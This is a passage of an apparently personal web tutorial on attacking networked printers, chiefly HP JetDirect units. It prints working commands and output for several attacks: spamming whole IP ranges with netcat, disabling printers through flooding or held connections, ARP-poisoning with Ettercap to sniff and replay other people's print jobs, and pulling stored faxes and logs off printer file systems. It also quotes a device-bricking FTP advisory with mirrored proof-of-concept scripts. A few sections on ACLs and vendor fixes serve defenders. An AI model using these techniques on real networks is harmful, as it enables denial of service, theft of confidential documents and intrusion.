2. Sometimes cutting out the middle man make a print job work when normally it
would not. Some PDFs used to give me fits when I used a Window 2000 server to
host print shares, but printing directly to the IP printer worked like a charm.
3. To bypass access rights to a printer or to get around print tracking
software like Pharos Uniprint or Equitrac.
Rather then waste space on how to set up direct IP printing in Windows I'll point you to Microsoft's howto:
http://www.microsoft.com/technet/prodtechnol/windowsserver2003/
library/ServerHelp/25468cbe-faab-424c-aae5-ddd333436c0d.mspx
and HP's:
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=bpj06391
If you wish to script the installation in Windows check out:
https://engineering.purdue.edu/ECN/Resources/KnowledgeBase/Docs/20040216090320
For you Linux users it's pretty easy to set up a direct IP printer too. Make sure you have CUPS (Common Unix Printing System) installed (for us Debian folks: apt-get install cupsys). Most Linux distributions have a GUI setup wizard now, but you can also add a direct IP printer from the shell by using a command like the following:
foomatic-configure -s cups -n My-Remote-JetDirect -c socket://192.168.1.2:9100/
Of course, you will want to change the IP and maybe the name to reflect your network and printer setup. If for some reason
http://192.168.4.2:631/printer
http://192.168.4.2:631/ipp
I'm rather surprised with the amount of E-mail, Net Message and Fax spam that know one seems to have tried Printer Spam. First, the attacker would need to have something to iterate though printers. I wrote a quick tool for Linux and Windows call IPIterator that does just this:
http://www.irongeek.com/i.php?page=security/ipiterator
The following example assumes that port 9100/tcp is open past the firewall (don't laugh, I've seen it), but with some motification I'm pretty sure it could be made to work with IPP and FTP enabled printers too. All one has to do is generate a PostScript or PCL file with the content they want to send it the spam message. The Windows "Printer to File" option works well for this. In a pinch a plain old text file will also work. Then they can use Netcat and IPIterator to send the print job to a whole IP range of printers.
Irongeek@Irongeek:~#
./ipiterator 192.168.3.1-5,25,"cat spam.prn|netcat -q 0 ~ip 9100" cat spam.prn|netcat -q 0 192.168.3.1 9100 Starting thread 1 cat spam.prn|netcat -q 0 192.168.3.2 9100 Starting thread 2 cat spam.prn|netcat -q 0 192.168.3.3 9100 Starting thread 3 cat spam.prn|netcat -q 0 192.168.3.4 9100 Starting thread 4 cat spam.prn|netcat -q 0 192.168.3.5 9100 Starting thread 5 DONE Irongeek@Irongeek:~# |
Evil I know, maybe I should not have mentioned it as now it may become more common. This facility might also be legitimately useful for sending out mass messages on a network where your work.
Side note on a Pharos Uniprint vulnerability
While this is not directly related to the article's main topic I thought that some of you would be interested in knowing about a vulnerability with the Pharos Uniprint system. It looks like Pharos Uniprint saves the last print jobs sent to a printer into C:\Program Files\Pharos\Temp\PORT*.PRN as a simple PCL print job which is readable by everyone on the Windows box by default. With a quick NetCat command (seen later in this article in the sniffing and replay section) or an FTP of the file to a JetDirect box it's easy to see what others have been printing out on that Windows workstation. Not very secure huh? It seems that Pharos did fix this in later versions, as Edward Burhenn stated in his email to me:
This was a "bug" in an older version of Pharos for which a hot fix was released: The application of Pharos 7.0 Hot Fix 1 ensures that no more spool file copies will be retained after print jobs for both Popups and non-Popups printers. Existing copies of old spool files in the ...\Pharos\Temp folder will need to be deleted manually. To avoid any further confusion could you post an update to the article, perhaps directing folk to the hot fix which can be downloaded from our website: http://www.pharos.com/Support/index.html? Thanks, Ed Edward Burhenn Technical Specialist |
DoSing the network or the printer
As should be obvious by now for those that have been paying attention, it's pretty trivial to cause a DoS (Denial of Service) attack with a JetDirect box that's not password protected. A deviant user could just use the telnet or web interface to set the IP of the JetDirect to the same IP as the gateway - instant routing confusion. Another option for network mayhem would be to set the host name of the JetDirect box to that of another box on the network. This would mess a few things up if the facility uses dynamic DNS for host names. Also notice form the UDP port scan show earlier that the JetDirect box is running the NetBIOS naming service, so changing the host name on a Windows network could cause name resolution problems.
As for DoSing the printer, if someone wanted to be a dick they could just hop onto their *nix box and cat their hard drive to the printer, causing a print job the size of the local hard drive:
cat /dev/hda|netcat -q 0 192.168.1.2 9100
Much the same thing could be accomplished by FTPing your swap file to a JetDirect box that accepts FTP print jobs.
Another thing that could be done is to upload a corrupted firmware to the JetDirect box. This can be done by obtaining the HP Download Manager from:
and then attempting an upgrade of the firmware, but stopping the process halfway though. The JetDirect will be non responsive until a full firmware is uploaded again. An interesting side note, you can upgrade the firmware on a JetDirect even if you don't know the JetDirect's system password. Why HP did not require a password for a firmware update I have no idea; it just seems like common sense that they would. From reading Slobotron's article (linked at the bottom) it would seem you can also upgrade the firmware with Netcat.
On a lark I decided to test out the effects of connect to port 9100/tcp and holding the connection using the Telnet command. I tested it on a Ricoh Savin Aficio 2045e and a JetDirect 300x (J3263A) and the result was that the connection to port 9100/tcp seems to be single threaded. While I held the Telnet connection to port 9100 no other print jobs could be sent to the printer! The connection should timeout after awhile. Imagine if someone used an active connection on the LAN and a command like:
./ipiterator 192.168.1.*,25,"telnet ~ip 9100"
to knock out printing to a whole LAN! See the section above for more info on IPIterator.
Because of the relatively weak IP stacks in most network printers there are a lot of other little Denial of Service exploits. I recommend checking out http://www.securityfocus.com/bid/ for more DoS attacks. One of the more interesting attacks to be found recently (12/19/2006)comes form researcher Joxean Koret. I've got to thank the Pauldotcom pod cast (episode 55) for pointing it out to me. It seems that Mr. Koret found a flaw in some HP Jetdirect's that permanently bricks the printer server to the point it has to be sent back to HP to be fixed. For those that don't understand the term "brick" it means that the device has be made inoperatable because of a bad firmware or an electrical problem. This is a serious flaw since it effectively turns the JetDirect into a paperweight. In Joxean Koret's words:
HP FTP Printer Server Denial Of Service --------------------------------------- Author: Joxean Koret Date: 2006 Location: Basque Country Affected Software ----------------- Vendor: Hewlett Packard Description: HP Printers FTP Server Denial Of Service Description ----------- A problem exists in almost any currently used HP Printer with the FTP Print Server. Version 2.4 of the FTP Print Server will crash with only one shoot. Version 2.4.5, which is latest, will need various shoots (the number of shoots needed is currently unknow). While playing with my own FTP Fuzzer I tried finding flaws in HP's Printers. After trying with 5 printers I found the problem in all of these. The problem is a buffer overflow in the LIST and NLST command. In version 2.4 a single shoot sending a LIST command with a long string (about 256 characters) is sufficient enough to test the vulnerability. Take care trying it because two of my printers were crashed completely (you will need to make use of your warranty ;] ). Against 2.4 versions it can crash the complete printer and be unresponsive even after rebooting it. In version 2.4.5 (which is the latest) you need to send various times long shoots to the parameter LIST (a single shoot will not crash, printer will answer with a "Path too long" message). You will need to send various times a LIST command with long strings. When trying with other commands you will see that no problem is raised and the printer will always be responsive. After a successfull attack you may completely crash your printer (i.e., calling technical support to fix your crashed printer). The problem can be easily triggered by using any FTP fuzzing tool. You can crash your printer in about 10 second(s) in a LAN. The printer models I used in my tests are: * HP LaserJet 5000 Series (firmware R.25.15 / R.25.47) * HP LaserJet 5100 Series (firmware V.29.12) Attached goes POCs for the vulnerabilities. Workaround ---------- Disable the FTP print server as, surely, you aren't using it. Disclaimer ---------- The information in this advisory and any of its demonstrations is provided "as is" without any warranty of any kind. I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory. Contact ------- Joxean Koret < joxeankoret [at] yah00 [D0T] es > -- ----------------------------------- Agian, agian, egun batez jeikiko dira egiazko Ziberotarrak, egiazko euskaldunak, tirano arrotzen hiltzeko eta gure aiten aitek utzi daikien lurraren populiari erremetitzeko. ----------------------------------- |
It is not yet know
which JetDirect print servers are effected by this exploit as few people want to
take the chance of destroying their own. I've mirrored his two proof of concept
scripts if anyone would like to test them and let me know which JetDirects it
works on:
jd-dos2.4.5.py
jd-dos2.4.py
MITRE lists this bug as CVE-2006-6742. The buffer overflow in the LIST an NLST commands seem to overwrite part of the firmware so my best guess is that cheaper print servers without flash memory like the 170x are probably safe. From what I'm hearing HP is not taking this threat as seriously as they should given that someone could cripple printing for days at a corporation using this exploit and a tool like IPIterator. The only know fix as of yet is a preventative one, and that is to turn off the JetDirect's FTP service or to block port 21/TCP at the border of the network the print server is on. If anyone has more information on this flaw please email me. See: http://www.security.nnov.ru/Gnews955.html for more info on this vulnerability.
By the way, don't be the kind of person that would use one of the above techniques, I only mention them so that admins know what they need to guard against.
Update 01/20/2007: Looks like HP may have fixed this issue with a newer firmware:
http://www.securitytracker.com/alerts/2007/Jan/1017532.html
Still, if anyone has more information please email me.
Changing the LCD display text using HPhack, IGhphack or Hijetter
This is an old hack (1997) and does not accomplish much, but it is fun! Silicosis of L0pht (sili@l0pht.com) wrote the original exploit code for *nix systems and someone else ported it to NT/2000/XP based systems. Although it's been out there for a long time, it still works on every HP printer/JetDirect box I have seen. What the HP display hack allows you to do is set the text that displays on the little LCD panel of an HP printer. It accomplishes this over the network by sending packets to a JetDirect box hooked to the printer (or built into it).
The first thing you need to do is find out the IP or hostname of the JetDirect box that services the printer. You can do this in one of at least three ways. The first way is by hitting the little test button on the JetDirect box that's connected to the printer. If the JetDirect card is built in you may have to go through the menus and choose "Print Configuration". Another way is to go into your "Printers and Faxs" settings, right click and bring up the properties of the printer in question, and look under the Ports tab for the hostname (npi******). Once you have this information it's easy to run Silicosis ' little hack.
To run it from Windows just use the
following syntax: hpnt Hostname Message
Windows Example:
C:\>hpnt npi769e71 "Irongeek" HP Display hack -- sili@l0pht.com Hostname: npi769e71 Message: Irongeek Connecting.... Sent 54 bytes C:\>hpnt 192.168.1.14 "Irongeek Also" HP Display hack -- sili@l0pht.com Hostname: 192.168.1.14 Message: Irongeek Also Connecting.... Sent 59 bytes C:\> |
If you want to run it from Linux download the source code at the bottom of this section and compile it using gcc. The syntax is the same as the Windows version. Below is an example of how to compile and run it:
[root@balrog root]#
gcc -o hphack hp.c hp.c:28:12: warning: multi-line string literals are deprecated [root@balrog root]# ./hphack 192.168.1.14 "Irongeek" HP Display hack -- sili@l0pht.com Hostname: 192.168.1.14 Message: Irongeek Connecting.... Sent 54 bytes [root@balrog root]# |
A few ideas for messages: "Hey Baby", "X was Here", "I see You", "Redrum", "Kill". Enjoy. If you like you can download Silicosis hack from one of these links:
I'm working on my own GUI version with extra features; its web page can be found here:
http://www.irongeek.com/i.php?page=security/jetdirecthack
Unfortunately it's pretty buggy.The easiest tool to use may be Hijetter by FtR of Phenoelit, which is covered in the next section.
Hijetter seems to be the Swiss army knife of HP JetDirect hacking. It can control a JetDirect box with PJL commands, and works even if a password is set (at least on my HP JetDirect 300X).You can download the binary and the source code for this app from:
http://www.phenoelit.de/hp/download.html
Below is a screen show of Hijetter 's interface. To use Hijetter just type in the IP or host name of your JetDirect box and click the connect icon.
You should notice that a few of the icons at the bottom of the interface light up.
You can only use the icons that are lit up. The first icon, from left to right, lets you control the file system on the JetDirect (if it has one), the next icon lets you make changes to the settings and the last icon lets you set the text that displace on the LCD screen. I'll cover these tasks in reverse order since I'm contrary like that.
Setting the LCD Display with Hijetter
1. After you have connected to the JetDirect box click the LCD Display icon.
2. Type in the message you want the printers LCD to display.
3. If you check the "Failure" radio button the printer will stop printing until someone hits the ok/continue/online button on the printer, or it's reset.
4. Click the confirm button and your message should now appear on the printers LCD.
Changing settings with Hijetter
1. After you have connected to the JetDirect box click the settings icon.
2. Find the environmental variable you want to change and type in the value you want to set it to, keeping in mind the limitations listed in the "Info" panel.
3. Use the assign button to set your change. An M should appear next to the variable you changed.
4. Click the confirm button and you're done.
Using Hijetter to treat some JetDirect boxes as files/web servers
1. After you have connected to the JetDirect box click the File System icon.
2. Use the arrows to transfer files to and from your client to the JetDirect box. Keep in mind that you can only transfer one file at a time with Hijetter.
3. The New Folder and Delete icons can be used for their obvious functions.
4. Click the confirm button and you're done.
Finding stored faxes and print jobs on Jetdirect printers
Look around the file system and download any files that looks interesting. Most of them don't have obvious file extensions so open them up in a text editor and look at the headers to try and figure out what they are. Here are a few of the things I've found by searching around this way:
Location | What I've found |
/saveDevice/DigitalSend/jobs | Jpegs with names like DS000848.005 that seem to be either print jobs or Faxes . |
/FaxOut | Tif files from sent Faxes |
/FaxIn | PCL files from received Faxes. See my NetCat and FTP tricks later for more information on how to print them. |
/Fax/act.log | Seems to be a log of phone numbers where things have be faxed to or from. Could be useful for social engineering. |
Also notice that the Hewlett-Packard LaserJet 4100 MFP we connected to has a 20Gig hard drive, which makes for a great place to hide and serve large files. I've noticed on the MFP a file can be uploaded to:
/webserver/home/
and can be accessed from the printers web interface at:
http://192.168.1.4/hp/device/
For example, if you used Hijetter to upload "naughtylinuxgirls.avi" to
"/webserver/home/" it can be accessed from the web with the URL:
http://192.168.1.4/hp/device/naughtylinuxgirls.avi
Feel free to put your homepage on a printer. :)
If you're a *nix or Window command line boy, don't despair. The same folks from Phenoelit have provided PFT, a command line utility that can do many of the same things as Hijetter. It can be downloaded and installed with these commands:
mkdir pjllib cd pjllib wget http://www.phenoelit.de/hp/libPJL-1.3-src.tgz tar -xzf libPJL-1.3-src.tgz make cd pft/ make |
Here is an example of what it
looks like on the command line after you bring up the help page; look at all of
the options:
Irongeek:/home/adrian/pjllib/pft#
./pft PFT - PJL file transfer FX of Phenoelit <fx@phenoelit.de> Version 0.7 ($Revision: 1.8 $) pft> help help <command> quit server [hostname] port [port number] connect close env {read|print|show|set|options|changed|commit|unprotect|bruteforce} message "Display Msg" failure "Failure Msg" volumes chvol [vol:] pwd ls cd [directory] mkdir [directory] rm [file] get [file] put [local file] append [local file] [file] lpwd lcd [directory] session timeout [timeout] pause pft> |
PFT also has some limited scripting ability by piping in commands from a text file as this example shows:
Irongeek:/home/adrian/pjllib/pft#
cat mypftscript.txt server 192.168.31.213 connect ls quit Irongeek:/home/adrian/pjllib/pft# ./pft <mypftscript.txt PFT - PJL file transfer FX of Phenoelit <fx@phenoelit.de> Version 0.7 ($Revision: 1.8 $) pft> Server set to 192.168.31.213 pft> Connected to 192.168.31.213:9100 Device: HP LaserJet 4100 MFP pft> 0:\ . - d .. - d PermStore - d PostScript - d PJL - d saveDevice - d cpbLog 5227 - Fax - d solution - d webServer - d FaxOut - d FaxIn - d pft> Irongeek:/home/adrian/pjllib/pft# |
Since Phenoelit provides the source code it could be an interesting project to write new automated tools for extracting information from remote JetDirect boxes.
Using IP ACLs to restrict access
One of the few way
that HP gives you to lock down a printer is IP ACLs (Access Control Lists).
Other network printer manufactures offer similar functionality. While the syntax
may differ a little form JetDirect to JetDirect the basics are the same. On
newer JetDirects you can use the web interface to restrict what IPs can connect
to the printer (normally you just want the CUPS or Windows print server to
connect) but on most all of them you can use the Telnet interface to restrict
what IPs can connect. This log should give you an idea of how the "acl allow: ip"
command is used:
Irongeek@Irongeek:~#
telnet 192.168.1.22 Trying 192.168.1.22... Connected to 192.168.1.22. Escape character is '^]'. HP JetDirect Password:pass You are logged in Please type "?" for HELP, or "/" for current settings > allow:0 > quit ===JetDirect Parameters Configured=== IP Address : 192.168.1.22 Subnet Mask : 255.255.255.0 Default Gateway : 192.168.1.1 Syslog Server : Not Specified Idle Timeout : 90 Seconds Set Cmnty Name : butt Host Name : NPI6D47B6 Default Get Cmnty : Disabled DHCP Config : Disabled Passwd : Enabled IPX/SPX : Enabled DLC/LLC : Enabled Ethertalk : Enabled Banner page : Enabled User Quitting Connection closed by foreign host. Irongeek@Irongeek:~# telnet 192.168.33.22 Trying 192.168.33.22... Connected to 192.168.33.22. Escape character is '^]'. HP JetDirect Password:pass You are logged in Please type "?" for HELP, or "/" for current settings > allow:192.168.19.56 > allow:192.168.20.0 255.255.255.0 > allow:list Access Control List: IP: 192.168.19.56 Mask: 255.255.255.255 IP: 192.168.20.0 Mask: 255.255.255.0 > quit ===JetDirect Parameters Configured=== IP Address : 192.168.33.22 Subnet Mask : 255.255.255.0 Default Gateway : 192.168.1.1 Syslog Server : Not Specified Idle Timeout : 90 Seconds Set Cmnty Name : butt Host Name : NPI6D47B6 Default Get Cmnty : Disabled DHCP Config : Disabled Passwd : Enabled IPX/SPX : Enabled DLC/LLC : Enabled Ethertalk : Enabled Banner page : Enabled User Quitting Connection closed by foreign host. Irongeek@Irongeek:~# |
Notice that if we now try to attach or port scan the JetDirect from an unauthorized host no connections can be made to any of the ports:
root@ScanBox:~#
nmap -A 192.168.1.22 Starting Nmap 4.00 ( http://www.insecure.org/nmap/ ) at 2006-03-16 21:30 EST Warning: OS detection will be MUCH less reliable because we did not find at least 1 open and 1 closed TCP port All 1672 scanned ports on 192.168.1.22 are: closed MAC Address: 00:60:B0:6D:47:B6 (Hewlett-packard CO.) Device type: general purpose|VoIP phone|broadband router|printer|print server|scanner|specialized|telecom-misc Running: Alpha Micro AMOS, Clipcomm embedded, D-Link embedded, DEC TOPS-20, HP embedded, Liebert embedded, Nortel embedded, SMC embedded Too many fingerprints match this host to give specific OS details Nmap finished: 1 IP address (1 host up) scanned in 16.921 seconds root@ScanBox:~# |
It's generally a good idea to set up this kind of IP restriction as it can stop some forms of attack (though not sniffing of print jobs using ARP poisoning).
Don't forget to look for Stored Documents via the web interface
I'm mostly putting this here because of the Ricoh Savins I've played with, but it's good advice for HP printers too. Look for Stored Documents via the web interface on the printers you find; many times users will save print jobs and faxes where the can be accessed from the web without even realizing it. I've found quite a few things this way in the past while performing audits.
Coding your own scripts with PHP, Perl and PJL
I thought some of you might be interested in writing you own scripts to change the printer display, or other tasks evolving PJL. First, read some of the PJL references linked in the reference section, then play around with telneting in an issuing the PJL commands directly. You will notice that there are quite a few that can be used to query the status of the printer:
Irongeek:~# telnet 192.168.1.33 9100 Trying 192.168.1.33... Connected to 192.168.1.33. Escape character is '^]'. @PJL INFO ID @PJL INFO ID "LASERJET 4000" @PJL INFO STATUS @PJL INFO STATUS CODE=10001 DISPLAY="Ready" ONLINE=TRUE @PJL INFO PAGECOUNT @PJL INFO PAGECOUNT 536225 @PJL INFO MEMORY @PJL INFO MEMORY TOTAL=2526160 LARGEST=1204208 ^] telnet> quit Connection closed. Irongeek:~# |
I decided to use Perl for my examples since its easy to use, multiplatform and pretty easy to do Sockets with. Most *nix systems should have Perl already, if you use Windows download and install Activestate's ActivePerl from here:
http://www.activestate.com/Products/ActivePerl/
Another useful resource is the "Printer Job Language Technical Reference Manual" which can be found at:
http://lprng.sourceforge.net/DISTRIB/RESOURCES/DOCS/pjltkref.pdf
read it and learn what can be done with PJL. Here are two links that may help you understand Perl and Socket programming:
http://www.perlfect.com/articles/sockets.shtml
http://www.rocketaware.com/perl/perlipc/TCP_Clients_with_IO_Socket.htm
Here are a few quick Perl scripts. This first one just lets you set the LCD display on a JetDirect enabled HP Printer:
#!/usr/bin/perl -w |
Sometimes the above version does not work, so try:
#!/usr/bin/perl -w |
It would seem that sometimes the escape character (27 dec, 1B hex, 033 oct) and "%-12345X" is needed and sometimes it's not. It appears from my reading that it's only needed for UEL (Universal Exit Language) commands. I'd like more details on when it has to be used and when it does not, email me if you know.
This script just sends a simple line of text to the printer directly:
#!/usr/bin/perl -w |
This one does a countdown on the LCD screen, then ends with a bang:
#!/usr/bin/perl
-w |
I know some of you want the script that lets you make a printer web cam like the one I had up for a short while. You can download the PHP source code here:
http://irongeek.com/downloads/printeraction.7z
If you write any interesting scripts send them to me and I'll post them with your credits. Happy scripting!
Fixing a busted hard drive with Ghost
Matthew Hinton (info [at] fireshadow.net) sent me some details on fixing a broken hard drive in an HP 4100 MFP with Ghost, could be useful to quite a few of you in your printer is out of warranty:
Don't know if you'd be interested in the
details for your page or not. Where I work at we've been able to make a ghost image of the 4100 MFP hard drive load. This allows us to put it on new hard drives to reinstall in the EIO slot. What drove us to this insanity is as follows. We have about 10 or so of the 4100 MFP's here. After the warranty expired, they started getting the same error - "49.FF81 error" on the display. Pretty much it's a new EIO hard disk. HP has a procedure that may or may not work to reset it. $49 to talk to a tech over the phone since it's out of warranty. $345 for a new EIO disk from HP. Local guy wants $515 to come out with a new disk to fisk it. Taking apart the bad one, we noticed that it's a standard Toshiba 20 Gb laptop hard drive. The PC tech went and got a known good EIO hard disk, and we made a ghost image of it. We tried sending the ghost image back over to the bad drive, but got a "drive too smal error". The ghost image took fine on a seagate 40 Gb note book drive. Put the seagate drive on the controller card, reinstalled and it's working fine. Anyway, thanks for putting up the informative page. I'm using Hijetter right now to look at the variables on the printer. Sincerely, Matthew Hinton |
Sniffing print jobs and replaying them
How often do folk print things and think as long as no one gets hold of the hard copy there's no security risk? As it turns out, sniffing print jobs is pretty easy if you can get on the same LAN segment as the printer or print server. Since the print jobs are not encrypted sniffing and reprinting them to your own printer is comparatively a breeze if you know how. This example shows how to sniff between a Windows 2003 base print server and a JetDirect or Ricoh Savin based network printer that uses AppSocket (port 9100/tcp) for communications, but the principles should apply to other setups as well.
1. First we have to pull off a MitM (Man in the Middle) attack by ARP poisoning the JetDirect box and the Windows print server and saving the packets to a Pcap file. I'll use Ettercap on a Linux box to do this, but other apps may work as well. To pull it off I will use the following Ettercap command:
ettercap -T -q -w print.dump -M ARP /192.168.1.2/ //
where 192.168.1.2 is the IP of my network printer. Note that this will cover all of your bases, but can cause one hell of an ARP storm since Ettercap has to ARP poison every host on the subnet. In some cases it might be better (and faster) to just ARP poison between two host you know the traffic will be going though. Here is an example:
ettercap -T -q -w print.dump -M ARP /192.168.1.2/ /192.168.22.47/
where 192.168.1.2 is the IP of the network printer and 192.168.22.47 is the ip of the Window/*nix print server or PC sending the print job. Hit the "q" key at any time to stop the ARP poisoning and sniffing.
2. Now that we have our Pcap (also sometimes called a libpcap or tcpdump file) we have to open it up in Ethereal. Just use the File->Open menu and point it to the print.dump file made by Ettercap.
3. Once print.dump has been opened in Ethereal we need to filter it. Enter the following filter and hit Apply:
tcp.flags.syn == 1 && tcp.dstport == 9100
4. As you see from the screen shot above the filter got rid of a lot of the extraneous data. These four packets represent two print jobs, or at least the beginnings of them. Packets number 158 and 159 are part of the same print job. Packets number 510 and 511 are part the 2nd print job. What we want to do now is right click every other packet, starting with the first, and choose "Follow TCP Stream".
5. Once you have chosen "Follow TCP Stream" you should see a window something like the one above. Set the drop down box to only show the traffic destined to the network printer as shown above. Set the data type to RAW and then click the "Save As" button and call the output file something like "test1.job".
6. Repeat steps 4 and 5 for every other packet to get all of the print jobs captured.
7. At this point we could open up test "test1.job" in a text editor, and if it's a PostScript file, remove every line before:
%!PS-Adobe-3.0
and after:
%%EOF
to create a .PS file (PostScript) that could be opened up in GhostView on a *nix box. You might be able to do something similar with a PCL based print job, but I have not figured out what parts to remove yet. As it stands we can leave "test1.job" as it is, whether it's PCL or PostScript, and send it to the printer by replaying it with NetCat to a network printer we control. The command is quite simple:
cat test1.job|netcat -q 0 192.168.1.2 9100
where "test1.job" is the sniffed print job we want to replay and 192.168.1.2 is a network printer that we control. If the Netcat command seems too complex you could also just use an FTP client and FTP the captured print jobs to a JetDirect enabled printer (assuming FTP is enabled on the JetDirect box).
All this seems a bit complicated I know, so I'm thinking of asking the Cain team to add this functionality to their app to make it easier.
A note on Plain-text authentication protocols
Many of the above attacks are only possible because people don't enable passwords on their network printers. However, even if passwords are enabled they could still be sniffed pretty easily since most network printers use simple telnet or a web interface with out SSL to configure the system. Both telnet and http (with out SSL) passwords can easily be sniffed with packages like Ettercap, Cain or Dsniff. Some newer network printers, such as the HP Jetdirect en3700 (J7942A), can use SSL with their web interface (albeit with a self signed certificate) and the interface seems to be more that just a Java applet for using SNMP to control the Jetdirect. This is a much more secure option than the older Jetdirects that used unencrypted HTTP and SNMP v1/v2.
There's still a lot more out there I need to research and play with when it comes to hacking network printers. As with most of my projects this is a work in progress so feel free to email me your ideas. A few interesting topics might be:
-
Using Phenoelit's ChaiServices information to create worms, backdoor and other malware for HP JetDirect printers.
-
Modifying the PFT source code to make automated apps for searching an IP space and pulling files off of the network printers.
-
Vulnerabilities in network printer implementation like buffer overflows and such.
-
Hacking the firmware in JetDirects to create dial home (shell shoveling) drop boxes that could be left behind on target networks to help with intrusions. For those wanting to help install the HP Download Manager and look in "C:\Program Files\Hewlett-Packard\HP Download Manager\Upgrades\jetdirect" for the vendor firmwares.
-
Tracking Dots: http://www.eff.org/Privacy/printers/list.php
Also don't forget to check out SecurityFocus' online vulnerabilities database (http://www.securityfocus.com/) to see if your particular network printers have any outstanding issues. I know they have a few issues listed for some of the JetDirect boxes. While you're at it, check for vulnerabilities in the base OS that the network printer uses, VxWorks in the case of some JetDirects and NetBSD for the Ricoh Savins.
I hope you have found this article interesting. If you have any ideas or comments please feel free to e-mail me. Happy printer hacking.
HP Web JetAdmin (without registering)
http://www.svrops.com/svrops/dwnldprog.htm
HP JetAdmin for Window 2000 3.42, the last version to be
released
http://www.helpdesk.umd.edu/os/windows_nt/printing/674/
HP Download Manager (for upgrading firmware)
http://www.hp.com/go/dlm_sw
Ghostscript, Ghostview and GSview
http://www.cs.wisc.edu/~ghost/
SmartDeviceMonitor
http://www.ricoh-usa.com/products/product_features.asp?pCategoryId=
19&pSubCategoryId=46&pCatName=Solutions&pSubCatName=
Device%20Management&pProductId=67&pProductName=SmartDeviceMonitor&tsn=Ricoh-USA
Foundstone's SNScan (find network printers that use SNMP, which
seems to be most of them)
http://www.foundstone.com/resources/proddesc/snscan.htm
SoftPerfect's NetScan (also useful for scanning for SNMP services)
http://www.softperfect.com/products/networkscanner/
Silicosis' HP Printer Display Hack
http://www.irongeek.com/i.php?page=security/hphack
Irongeek's GUI HP Printer Display Hack
http://www.irongeek.com/i.php?page=security/jetdirecthack
IPIterator
http://www.irongeek.com/i.php?page=security/ipiterator
Hijetter
http://www.phenoelit.de/hp/download.html
Ettercap
http://ettercap.sourceforge.net/
Ethereal
http://www.ethereal.com/
NetCat
http://netcat.sourceforge.net/
Net-SNMP
http://net-snmp.sourceforge.net/
Here's a collection of videos and other media on Network Printer Hacking you might be interest in:
Network Printer Hacking: Irongeek's Presentation at Notacon 2006
http://irongeek.com/i.php?page=videos/notacon2006printerhackingSlide and other resources from the above presentation
http://irongeek.com/downloads/notacon2006.zipInfonomicon TV Ep 7
http://irongeek.com/i.php?page=videos/infonomicontv7
Useful links for further research:
Common print server port numbers
http://members.cruzio.com/~jeffl/sco/lp/printservers.htm
HP's guide to securing JetDirect printers
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=bpj05999
Understanding, Reversing, and Hacking HP Printers by Slobotron
http://www.searchlores.org/realicra/hp_slobo.htm
SecurityFocus' online vulnerabilities database
http://www.securityfocus.com/
Network Printers and Other Peripherals -- Vulnerabilities and
Fixes by Dennis Mattison (Littlew0lf)
http://members.cox.net/ltlw0lf/printers/index.html
older version:
http://freshmeat.net/articles/view/445/
Securing Network Print Jobs - An LRS White Paper
http://www.lrs.com/EOM/Solutions/Papers/secure.aspx
Printer Job Language Technical Reference Manual
http://lprng.sourceforge.net/DISTRIB/RESOURCES/DOCS/pjltkref.pdf
Printers, Proxies and Pranksters An April Fool's Recipe for Fun
by Kellegous
http://web.kellegous.com/scratch/2003/printers1KBXB/
RICOH Aficio 2035 "security'' by mslaviero
http://www.cs.up.ac.za/cs/mslaviero/archives/2005/04/28/ricoh-afficio-2035-security-or-lack-thereof/
Special thanks to Nancy for proof reading and making my English intelligible.
02/06/2007: I've updated
info on the fix for the
Pharos cached print job vulnerability
01/20/2007: HP seems to have released a fix for the FTP DoS
problem. See the
Printer DoSing section.
01/10/2007: Fixed and added some links in the
Printer DoSing section.
01/06/2007: Add information on the Joxean Koret attack to the
Printer DoSing section.
04/18/2006: Added link to a newer version of Littlew0lf's
article.
04/10/2006: Added Media section.
04/02/2006: Added a bunch of information for my presentation at
Notacon 2006
Added section: Stupid Printer Tricks
Added section: Finding info about the printer using SNMP tools.
Added section: Finding Printers with Google.
Added section: RSH commands and Richo Savin Aficio Printers.
Added section: Spamming Printers.
Added section: Getting a JetDirect password remotely using the SNMP vulnerability
Added information about SSL with newer Jetdirects to A note on Plain-text authentication protocols and JetDirect password notes sections.
Added information on SmartDeviceMonitor to Finding Network printers using Nmap and SNMP tools and Finding info about the printer using SNMP tools as well as adding screenshot of the SNMP tools mentioned. I also added some details on finding network printers via their MAC address.
Added information on holding a connection to port 9100/tcp to DoSing the network or the printer.
Added information on IPX/AppleTalk/SMB to Intro to the concepts.
Added alternate Perl script and added PHP web form to Coding your own scripts with PHP, Perl and PJL.
Added HP firmware location to Other Ideas.
01/18/2006: Added section on
Fixing a busted hard drive
with Ghost.
09/14/2005: Found another missing image, the LCD Display icon from Hijetter. It's fixed now. I also added a link suggested by Dick from Hack A Day.
09/14/2005:
Hack A Day added a
link to this site and I noticed that the Hijetter file system image was broken. It
should be fixed now.
09/13/2005: Added "Coding your own scripts with Perl and PJL"
section.
09/11/2005: First posted.
Irongeek's Notes For Later:
nano /etc/init.d/sysklogd
-r
LAND attacks